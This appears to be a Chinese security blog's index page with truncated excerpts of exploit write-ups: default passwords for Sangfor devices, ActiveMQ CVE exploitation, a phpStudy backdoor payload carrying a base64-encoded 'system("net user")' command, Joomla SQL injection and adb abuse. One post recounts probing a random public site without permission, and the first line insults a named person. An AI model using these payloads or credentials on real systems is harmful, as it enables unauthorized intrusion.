各位,马斌兵是2货你们同意吗 设备 默认账号 默认密码 深信服产品 sangfor sangfor sangfor@2018 sangfor@2019 深信服科技 AD dlanrecover 深信服...
ActiveMQ CVE-2015-5254 反序列化漏洞利用
所需工具jmet 下载地址:https://github.com/matthiaskaiser/jmet/releases 文件下载后在同目录下创建一个external文件夹(否则可能会爆文件夹不存在...
ActiveMQ任意文件写入漏洞利用(CVE-2016-3088)
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使...
记一次PHPstudy漏洞挖掘过程
今天有点烦躁,所以得找点事刺激一下 于是,公网上搜了一个PHPstudy的站 测试payload看看有没有漏洞,果然、存在漏洞 看一下目录 GET /phpinfo.php HTTP/1.1 Host...
phpstudy后门漏洞利用payload
payload: Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 这个后面是base64加...
PHPmyadmin批量监测
#!coding:utf-8 import requests,re,os from sys import argv print ''' [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%...
记一次对 Joomla CMS 渗透过程
首先,对其进行扫描 发现其版本为 Joomla 3.7.0 于是,搜索这个版本的漏洞,,, 发现存在SQL注入漏洞,继续查看详情 上sqlmap跑一波,成功爆库。。。 接下来,爆表 爆用户名密码 在线...
WordPress 插件 activity monitor 远程代码执行漏洞复现
这个漏洞需要登录后台后才能利用,我这里是本地漏洞复现,所以忽略登录过程。。。 这里有个在线靶场,有兴趣的可以练练: https://www.mozhe.cn/bug/detail/Zis0bC9SUn...
Android设备调式模式利用
Android 调试模式 (adb) 一般情况下,是没有开启的。adb 通过 USB 与设备进行通信,但是也可以开启WIFI进行连接手机,进行远程的调试。由于开启了链接wifi的调试,从而被黑客利用并...
